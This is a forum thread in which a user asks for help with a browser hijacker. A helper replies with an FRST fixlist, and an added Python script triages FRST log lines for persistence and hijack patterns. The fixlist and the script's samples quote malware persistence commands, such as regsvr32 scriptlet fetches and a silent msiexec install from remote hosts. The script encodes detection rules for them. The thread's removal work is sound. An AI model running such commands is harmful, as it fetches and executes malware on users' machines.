Elektroda.pl
FRST logs, request for a check

lopek2016 06 May 2017 18:11
  • #1 06 May 2017 18:11
    lopek2016
    Level 2

    Hello,
    for a week I have had a problem with the browsers on my computer. My language changed from English to Polish, and my start page changed to "www.searchinme.com". I found out that this is a virus, but a scan with AdwCleaner did nothing, so I ran FRST and am asking you to check its logs and help me further with removing the virus. The logs I produced are attached.
    Thank you very much in advance for your help.

  • #2 06 May 2017 18:31
    Kolobos
    Computer specialist

    In Chrome's settings, turn off restoring the set of pages when the browser starts.

    Run the following Fixlist.txt with FRST:
    CloseProcesses:
    CustomCLSID: HKU\S-1-5-21-1154790221-3299570698-3960240069-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-8CE15CF6A282}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
    Task: {4865E95F-F311-44BF-9441-701A6560523C} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.yzsgrwz.com/?data=zDlkMj82FdI1MTIdMjH5M8U2RTH4OUU3FUF5MdhSFdw5MWI5MH== scrobj.dll
    Task: {4FB2704F-3478-435F-95AF-AB3674542945} - System32\Tasks\Opera scheduled Autoupdate 1487937006 => C:\Users\Łukasz\AppData\Local\Programs\Opera\launcher.exe
    Task: {685C7228-795A-4D29-8C03-033C151387B1} - System32\Tasks\Opera scheduled suite Autoupdate 1487937017 => C:\Users\Łukasz\AppData\Local\Programs\Opera\launcher.exe
    Task: {B5476673-C0FF-4910-8B6E-019FB96EC2B3} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://7c8ogu7.x.incapdns.net/?data=zDlkMj82FdI1MTIdMjH5M8U2RTH4OUU3FUF5MdhSFdw5MWI5MH== scrobj.dll
    Task: {D8FAD40A-D0AE-4615-AD31-6C807A81E494} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
    Task: {FC9A0353-1DF3-4C43-91CE-8FC6186DFAD3} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== ATTENTION
    Shortcut: C:\Users\Łukasz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Zoohair\Application\chrome.exe (Google Inc.)
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Zoohair\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Zoohair\Application\chrome.exe (Google Inc.)
    ShortcutWithArgument: C:\Users\Łukasz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\AmazonShopping.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.amazon.co.uk/gp/bit/amazonbookmark.html?tag=hp2-desktop-uk-21&partner=HP
    ShortcutWithArgument: C:\Users\Łukasz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\TripAdvisor.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://js.redirect.hp.com/jumpstation?bd=all&...pf=cmnb&s=TripAdvisor_iefav&tp=iefavs
    (Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
    () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
    (AVAST Software) C:\Users\Łukasz\AppData\Local\background_fault\aswRD.exe
    (Tencent) C:\Users\Łukasz\AppData\Local\background_fault\QQIme.exe
    (Tencent) C:\Users\Łukasz\AppData\Local\background_fault\QQIme.exe
    HKU\S-1-5-21-1154790221-3299570698-3960240069-1001\...\Run: [Opera Browser Assistant] => C:\Users\Łukasz\AppData\Local\Programs\Opera\suite\browser_assistant.exe [1286744 2017-02-15] (Opera Software)
    HKU\S-1-5-21-1154790221-3299570698-3960240069-1001\...\Run: [background_fault] => C:\Users\Łukasz\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-03] (AVAST Software) <===== ATTENTION
    HKU\S-1-5-21-1154790221-3299570698-3960240069-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.tslznzq.com/?data=zDlkMj82FdI1MTIdMjH5M8U2RTH4OUU3FUF5MdhSFdw5MWI5MH== /q
    HKU\S-1-5-21-1154790221-3299570698-3960240069-1001\...\MountPoints2: {b9951fa6-eee2-11e6-9be1-184f3291f5dc} - "G:\HiSuiteDownLoader.exe"
    HKU\S-1-5-21-1154790221-3299570698-3960240069-1001\...\MountPoints2: {bfa29c36-a2a0-11e6-9bda-184f3291f5dc} - "G:\HiSuiteDownLoader.exe"
    HKU\S-1-5-21-1154790221-3299570698-3960240069-1001\...\MountPoints2: {ff230bc4-cc39-11e6-9bde-184f3291f5dc} - "G:\HiSuiteDownLoader.exe"
    IFEO\taskmgr.exe: [Debugger]
    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...om=che0812&uid=ST500LT012-1DG142_SBY0MFCL
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...om=che0812&uid=ST500LT012-1DG142_SBY0MFCL
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...812&uid=ST500LT012-1DG142_SBY0MFCL&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...812&uid=ST500LT012-1DG142_SBY0MFCL&q={searchTerms}
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...om=che0812&uid=ST500LT012-1DG142_SBY0MFCL
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...om=che0812&uid=ST500LT012-1DG142_SBY0MFCL
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...812&uid=ST500LT012-1DG142_SBY0MFCL&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...812&uid=ST500LT012-1DG142_SBY0MFCL&q={searchTerms}
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\S-1-5-21-1154790221-3299570698-3960240069-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...om=che0812&uid=ST500LT012-1DG142_SBY0MFCL
    HKU\S-1-5-21-1154790221-3299570698-3960240069-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...om=che0812&uid=ST500LT012-1DG142_SBY0MFCL
    SearchScopes: HKLM-x32 -> {C051444C-E8BE-4EDA-A3AB-35561E59C0AB} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?i...k%5Fcode=qs&index=aps&field-keywords={searchTerms}
    SearchScopes: HKU\S-1-5-21-1154790221-3299570698-3960240069-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...812&uid=ST500LT012-1DG142_SBY0MFCL&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1154790221-3299570698-3960240069-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...812&uid=ST500LT012-1DG142_SBY0MFCL&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1154790221-3299570698-3960240069-1001 -> {C051444C-E8BE-4EDA-A3AB-35561E59C0AB} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?i...k%5Fcode=qs&index=aps&field-keywords={searchTerms}
    Edge HomeButtonPage: HKU\S-1-5-21-1154790221-3299570698-3960240069-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=...om=che0812&uid=ST500LT012-1DG142_SBY0MFCL
    FF Homepage: Mozilla\Firefox\Profiles\jwh5bs5t.default-1493303268211 -> hxxp://www.ourluckysites.com/?type=hp&ts=...om=che0812&uid=ST500LT012-1DG142_SBY0MFCL
    FF SearchPlugin: C:\Users\Łukasz\AppData\Roaming\Mozilla\Firefox\Profiles\jwh5bs5t.default-1493303268211\searchplugins\ourluckysites.xml [2017-05-05]
    FF ProfilePath: C:\Users\Łukasz\AppData\Roaming\Firefox\Firefox\Profiles\jwh5bs5t.default-1493303268211 [2017-05-06]
    FF Extension: (SimilarWeb) - C:\Users\Łukasz\AppData\Roaming\Firefox\Firefox\Profiles\jwh5bs5t.default-1493303268211\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-05-05] [not signed]
    FF Extension: (HSearch) - C:\Users\Łukasz\AppData\Roaming\Firefox\Firefox\Profiles\jwh5bs5t.default-1493303268211\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-05-05] [not signed]
    FF Extension: (FF Adr) - C:\Users\Łukasz\AppData\Roaming\Firefox\Firefox\Profiles\jwh5bs5t.default-1493303268211\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-05-05] [not signed]
    FF Extension: (Polski Language Pack) - C:\Users\Łukasz\AppData\Roaming\Firefox\Firefox\Profiles\jwh5bs5t.default-1493303268211\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-05-05] [not signed]
    FF SearchPlugin: C:\Users\Łukasz\AppData\Roaming\Firefox\Firefox\Profiles\jwh5bs5t.default-1493303268211\searchplugins\startsearch.xml [2017-05-05]
    CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=...om=che0812&uid=ST500LT012-1DG142_SBY0MFCL
    CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1493982073&z=b85d049a089782ecc4fac2fg5zetecbt0bco1eem4o&from=che0812&uid=ST500LT012-1DG142_SBY0MFCL"
    CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&...812&uid=ST500LT012-1DG142_SBY0MFCL&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> ourluckysites
    R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-04] (windows) [File not signed]
    R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [107672 2017-05-04] () <==== ATTENTION
    R2 GameExplorerUpdate; C:\ProgramData\Microsoft\Windows\GameExplorer\Resources.dll [113664 2017-04-19] () [File not signed]
    R2 IISvr; C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795\Installers\IIS\iisexp.dll [105472 2017-05-04] () [File not signed]
    R2 SANARE; C:\Users\Łukasz\AppData\Local\SANARE\Snare.dll [826368 2017-05-04] (InterSect Alliance Pty Ltd) [File not signed]
    R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
    R2 WANARE; C:\Users\Łukasz\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [File not signed]
    R2 WinSAPSvc; C:\Users\Łukasz\AppData\Roaming\WinSAPSvc\WinSAP.dll [603648 2017-05-05] (WinSAP) [File not signed] <==== ATTENTION
    S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
    U3 aspnet_state; No ImagePath
    2017-05-05 13:01 - 2017-05-06 05:03 - 00000000 ____D C:\Users\Łukasz\AppData\Local\background_fault
    2017-05-05 13:01 - 2017-05-05 13:01 - 00000000 ____D C:\Users\Łukasz\AppData\Local\WANARE
    2017-05-05 13:01 - 2017-05-05 13:01 - 00000000 ____D C:\ProgramData\BIT
    2017-05-05 12:28 - 2017-05-05 12:28 - 00000000 ____D C:\Users\Public\Documents\Google
    2017-05-05 12:28 - 2017-05-05 12:28 - 00000000 ____D C:\Users\Łukasz\AppData\Roaming\Firefox
    2017-05-05 12:28 - 2017-05-05 12:28 - 00000000 ____D C:\Users\Łukasz\AppData\Local\Zoohair
    2017-05-05 12:28 - 2017-05-05 12:28 - 00000000 ____D C:\Users\Łukasz\AppData\Local\Firefox
    2017-05-05 12:28 - 2017-05-05 12:28 - 00000000 ____D C:\Program Files (x86)\Zoohair
    2017-05-05 12:28 - 2017-05-05 12:28 - 00000000 ____D C:\Program Files (x86)\Firefox
    2017-05-05 12:25 - 2017-05-06 16:44 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-05-05 12:25 - 2017-05-05 12:25 - 00034328 _____ (Sysinternals - www.sysinternals.com) C:\WINDOWS\system32\Drivers\PROCEXP152.SYS
    2017-05-04 17:49 - 2017-05-05 13:01 - 00003652 _____ C:\WINDOWS\System32\Tasks\Milimili
    2017-05-04 17:49 - 2017-05-05 13:01 - 00003594 _____ C:\WINDOWS\System32\Tasks\Windows-PG
    2017-05-04 17:49 - 2017-05-05 13:00 - 00000000 ____D C:\Users\Łukasz\AppData\Roaming\WinSAPSvc
    2017-05-04 17:49 - 2017-05-04 17:49 - 00000000 ____D C:\WINDOWS\psgo
    2017-05-04 17:49 - 2017-05-04 17:49 - 00000000 ____D C:\Users\Łukasz\AppData\Local\SANARE
    2017-05-01 07:35 - 2017-05-05 12:28 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-04-20 22:33 - 2017-04-20 22:33 - 00000000 ____D C:\ProgramData\Software
    2017-04-20 22:07 - 2017-05-05 12:58 - 00000000 ____D C:\AdwCleaner
    2017-04-20 21:39 - 2017-04-20 21:39 - 00023032 _____ (Wiper Software) C:\WINDOWS\system32\wiperrm.exe
    2017-04-20 11:56 - 2017-05-05 12:25 - 00000000 _____ C:\WINDOWS\SysWOW64\11
    2017-04-20 11:56 - 2017-04-20 16:07 - 00000000 _____ C:\WINDOWS\SysWOW64\22
    2017-04-19 19:16 - 2017-04-20 22:21 - 00000000 ____D C:\WINDOWS\system32\log
    2017-04-19 18:24 - 2017-04-27 17:23 - 00000000 ____D C:\Users\Łukasz\AppData\Local\3DM
    2017-04-17 16:07 - 2017-04-17 16:07 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-17 16:07 - 2017-04-17 16:07 - 00000000 ____D C:\Program Files (x86)\58F4CC25_jumpeasy
    2017-04-17 16:02 - 2017-05-05 12:25 - 00000000 ____D C:\Program Files (x86)\BiaoJi
    2017-04-15 16:39 - 2017-04-15 16:39 - 00003690 _____ C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe
    2017-04-15 16:38 - 2017-04-15 16:38 - 00000000 ____D C:\Users\Łukasz\AppData\Roaming\SSMgre
    2017-04-10 11:36 - 2017-04-15 16:39 - 00003668 _____ C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT
    EmptyTemp:

    In FRST, click Fix.

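The fixlist above is the result of reading an FRST log by eye for a handful of persistence and hijack patterns: a scheduled task that runs regsvr32 with a remote scriptlet, a task that launches PowerShell, a Winlogon Shell value that is no longer plain explorer.exe, an IFEO Debugger on taskmgr.exe, Run keys and services living in the user profile or unsigned, browser start/search settings pointing at an unexpected host, and a Chrome shortcut retargeted to another chrome.exe. The Python script below is an added example for this page, not FRST code and not part of either post; it encodes those patterns as rules and runs them over FRST-style lines. The rule set, the TRUSTED_HOSTS allowlist, the finding tags and the SAMPLE_LINES (abridged from the fixlist, URLs kept defanged as hxxp://) are assumptions of the example.

```python
"""Triage FRST (Farbar Recovery Scan Tool) log lines for the persistence and
browser-hijack patterns visible in this thread.

Added example, not FRST code and not part of the original posts.  The rules,
TRUSTED_HOSTS and SAMPLE_LINES (abridged from the thread's fixlist, URLs left
defanged) are assumptions made for the example.
"""
import re
from urllib.parse import urlparse

# FRST and the forum defang live URLs as hxxp://; accept both forms.
URL_RE = re.compile(r"h(?:xx|tt)ps?://[^\s\"']+", re.IGNORECASE)

# Hosts a user might plausibly have chosen as homepage or search provider.
# Assumption: any other host in a browser setting deserves a look.
TRUSTED_HOSTS = {"www.google.com", "www.bing.com", "hp15-comm.msn.com",
                 "www.amazon.co.uk"}

# Fragments of FRST lines that carry homepage / search-provider settings.
BROWSER_KEYS = ("Start Page", "Search Page", "Default_Page_URL",
                "Default_Search_URL", "SearchScopes:", "HomeButtonPage",
                "FF Homepage", "CHR HomePage", "CHR StartupUrls",
                "CHR DefaultSearchURL")


def hosts_in(line):
    """Hostnames of every (possibly defanged) URL on the line."""
    return [urlparse(u.lower().replace("hxxp", "http")).hostname or ""
            for u in URL_RE.findall(line)]


def classify(line):
    """Return (tag, reason) findings for one FRST line; [] if nothing matched."""
    s = line.strip()
    low = s.lower()
    out = []
    if s.startswith("Task:"):
        if "regsvr32" in low and "scrobj.dll" in low and "/i:h" in low:
            out.append(("squiblydoo", "scheduled task runs regsvr32 with a remote scriptlet"))
        elif "powershell" in low:
            out.append(("task-powershell", "scheduled task launches a PowerShell script"))
    # Winlogon Shell under the user's Policies key: anything after explorer.exe runs at every logon.
    if "\\policies\\system: [shell]" in low and not re.fullmatch(
            r".*\[shell\]\s*explorer\.exe\s*", low):
        out.append(("winlogon-shell", "Shell value is not plain explorer.exe; extra command runs at logon"))
    if low.startswith("ifeo\\") and "[debugger]" in low:
        target = s.split("\\", 1)[1].split(":")[0]
        out.append(("ifeo-debugger", "IFEO Debugger hooks " + target))
    if "\\run: [" in low and ("\\appdata\\local\\" in low or "\\appdata\\roaming\\" in low):
        out.append(("run-userprofile", "Run key autostarts a binary from the user profile"))
    # Service lines start with a state/type code such as R2 or S2.
    if re.match(r"[RS]\d ", s) and ("[file not signed]" in low
                                    or "\\programdata\\" in low or "\\appdata\\" in low):
        out.append(("service-untrusted", "service binary unsigned or in a user-writable path"))
    if any(k in s for k in BROWSER_KEYS):
        bad = sorted({h for h in hosts_in(s) if h and h not in TRUSTED_HOSTS})
        if bad:
            out.append(("browser-hijack", "start/search setting points at " + ", ".join(bad)))
    if (s.startswith("Shortcut:") and "chrome.lnk" in low
            and "\\google\\chrome\\application\\" not in low):
        out.append(("shortcut-hijack", "Chrome shortcut retargeted to a non-Google chrome.exe"))
    return out


def triage(lines):
    """Map each flagged line to its findings; clean lines are omitted."""
    report = {}
    for ln in lines:
        findings = classify(ln)
        if findings:
            report[ln] = findings
    return report


# Constructed sample: lines abridged from the thread's fixlist (7 bad, 1 benign).
SAMPLE_LINES = [
    r"Task: {4865E95F-F311-44BF-9441-701A6560523C} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.yzsgrwz.com/?data=abc scrobj.dll",
    r"Task: {D8FAD40A-D0AE-4615-AD31-6C807A81E494} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1",
    r"HKU\S-1-5-21-1154790221-3299570698-3960240069-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.tslznzq.com/?data=abc /q",
    r"IFEO\taskmgr.exe: [Debugger]",
    r"HKU\S-1-5-21-1154790221-3299570698-3960240069-1001\...\Run: [background_fault] => C:\Users\Łukasz\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-03] (AVAST Software) <===== ATTENTION",
    r"R2 WinSAPSvc; C:\Users\Łukasz\AppData\Roaming\WinSAPSvc\WinSAP.dll [603648 2017-05-05] (WinSAP) [File not signed] <==== ATTENTION",
    r"CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&from=che0812&q={searchTerms}",
    r"SearchScopes: HKLM-x32 -> {C051444C-E8BE-4EDA-A3AB-35561E59C0AB} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?field-keywords={searchTerms}",
]

if __name__ == "__main__":
    for ln, findings in triage(SAMPLE_LINES).items():
        for tag, reason in findings:
            print(f"[{tag}] {reason}\n    {ln}")
```

The output is a list of leads, not verdicts: the same run-userprofile rule that catches aswRD.exe also fires on the Opera Browser Assistant Run key, because legitimate per-user installers live under AppData too. Confirm each hit against the full FRST output (file dates, signer, companion directories) before it goes into a fixlist, and remember the script only reads; writing the fixlist and running Fix in FRST is still a manual step.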